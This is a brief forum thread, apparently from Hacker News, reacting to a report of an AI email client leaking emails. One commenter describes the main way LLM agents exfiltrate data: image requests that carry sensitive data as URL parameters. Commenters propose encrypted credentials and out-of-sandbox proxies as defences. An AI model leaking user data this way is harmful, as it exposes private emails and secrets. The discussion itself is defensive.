zlacker

[return to "Superhuman AI Exfiltrates Emails"]
1. 0xferr+TI[view] [source] 2026-01-12 22:39:36
>>takira+(OP)
The primary exfiltration vector for LLMs is making network requests via images with sensitive data as parameters.

As Claude Code increasingly uses browser tools, we may need to move away from .env files to something encrypted, kind of like rails credentials, but without the secret key in the .env

◧◩
2. xyzzy1+KH1[view] [source] 2026-01-13 09:46:19
>>0xferr+TI
One tactic I've seen used in various situations is proxies outside the sandbox that augment requests with credentials / secrets etc.

Doesn't help in the case where the LLM is processing actually sensitive data, ofc.

[go to top]